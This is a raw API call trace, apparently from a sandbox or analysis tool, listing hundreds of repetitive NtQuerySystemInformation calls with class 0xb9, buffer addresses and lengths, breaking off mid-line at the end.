[0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x38, ResultLength=0x0) [0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x20, ResultLength=0x0) [0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x38, ResultLength=0x0) [0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x20, ResultLength=0x0) [0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x20, ResultLength=0x0) [0208.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x20, ResultLength=0x0) [0208.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x58, ResultLength=0x0) [0208.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x38, ResultLength=0x0) [0208.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0208.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0208.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0208.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0208.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfb0, Length=0x28, ResultLength=0x0) [0208.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x38, ResultLength=0x0) [0208.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x28, ResultLength=0x0) [0208.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x28, ResultLength=0x0) [0208.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0208.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x20, ResultLength=0x0) [0208.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x20, ResultLength=0x0) [0208.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x20, ResultLength=0x0) [0208.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x38, ResultLength=0x0) [0208.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x38, ResultLength=0x0) [0208.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x20, ResultLength=0x0) [0208.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x20, ResultLength=0x0) [0208.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x20, ResultLength=0x0) [0208.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x58, ResultLength=0x0) [0208.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x38, ResultLength=0x0) [0208.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0208.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0208.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0208.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0208.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfb0, Length=0x28, ResultLength=0x0) [0208.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x38, ResultLength=0x0) [0208.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x28, ResultLength=0x0) [0208.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x28, ResultLength=0x0) [0208.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x38, ResultLength=0x0) [0208.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x20, ResultLength=0x0) [0208.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0208.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0208.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0208.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x38, ResultLength=0x0) [0208.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x20, ResultLength=0x0) [0208.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x20, ResultLength=0x0) [0208.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x20, ResultLength=0x0) [0208.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x58, ResultLength=0x0) [0208.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x38, ResultLength=0x0) [0208.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x28, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x28, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x28, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x28, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x28, ResultLength=0x0) [0208.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x38, ResultLength=0x0) [0208.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x38, ResultLength=0x0) [0208.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd000, Length=0x28, ResultLength=0x0) [0208.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd000, Length=0x28, ResultLength=0x0) [0208.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x38, ResultLength=0x0) [0208.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x38, ResultLength=0x0) [0208.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce70, Length=0x20, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x38, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf60, Length=0x20, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x38, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf60, Length=0x20, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x38, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf60, Length=0x20, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd458, Length=0x50, ResultLength=0x0) [0208.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd380, Length=0x38, ResultLength=0x0) [0208.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x28, ResultLength=0x0) [0208.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x28, ResultLength=0x0) [0208.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x28, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x28, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd380, Length=0x38, ResultLength=0x0) [0208.538] NtQuerySystemInformation 